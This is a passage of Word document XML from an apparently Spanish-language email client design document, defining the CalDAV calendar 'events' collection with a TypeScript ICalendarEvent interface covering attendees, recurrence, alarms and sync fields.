      <w:r>
        <w:t xml:space="preserve">— TTL index (30 días), expireAfterSeconds: 2592000.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:id="86" w:name="colección-events-calendario-caldav"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.8 Colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">events</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Calendario CalDAV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">events</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">almacena los eventos de calendario sincronizados vía CalDAV (RFC 4791) usando tsdav como cliente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El soporte de calendario es un requisito competitivo: los usuarios esperan aceptar o declinar invitaciones de reunión directamente desde su cliente de email, una funcionalidad que Roundcube solo logra mediante plugins descritos como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">painful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de instalar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[131]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[225]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ICalendarEvent {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia al usuario */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Referencia a la cuenta (puede diferir del userId para calendarios compartidos) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** ID del calendario (colección CalDAV) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  calendarId</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Nombre del calendario */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  calendarName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Color asignado al calendario (hex) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  calendarColor</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UID del evento iCalendar (RFC 5545) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  uid</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Título del evento */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  summary</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Descripción */</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Ubicación */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  location</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Sala de reuniones (campo específico de sistemas enterprise) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  room</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Tipo de evento */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  eventType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'event'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'meeting'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'reminder'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'task'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Fecha y hora de inicio */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  startDate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Zona horaria de inicio (IANA tz database) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  startTimezone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Fecha y hora de fin */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  endDate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Zona horaria de fin */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  endTimezone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Si es un evento de día completo */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  allDay</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Regla de recurrencia (RRULE en formato iCalendar) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[158]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  recurrenceRule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Fechas excluidas de la recurrencia */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  recurrenceExceptions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Organizador del evento */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  organizer</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Asistentes invitados */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  attendees</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'needs-action'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'accepted'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'declined'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tentative'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'chair'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'required'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'optional'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Estado de la invitación (si el usuario es asistente) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  inviteStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'needs-action'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'accepted'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'declined'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tentative'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Alarma / recordatorio */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  alarm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    triggerMinutes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'display'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'email'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Si el evento proviene de un adjunto .ics en un email */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  sourceEmailId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Datos de sincronización CalDAV */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  caldavSync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    resourceUrl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etag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syncToken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lastSyncedAt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Visibilidad del evento */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  visibility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'default'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'public'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'private'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'confidential'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/** Estado del evento */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'confirmed'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
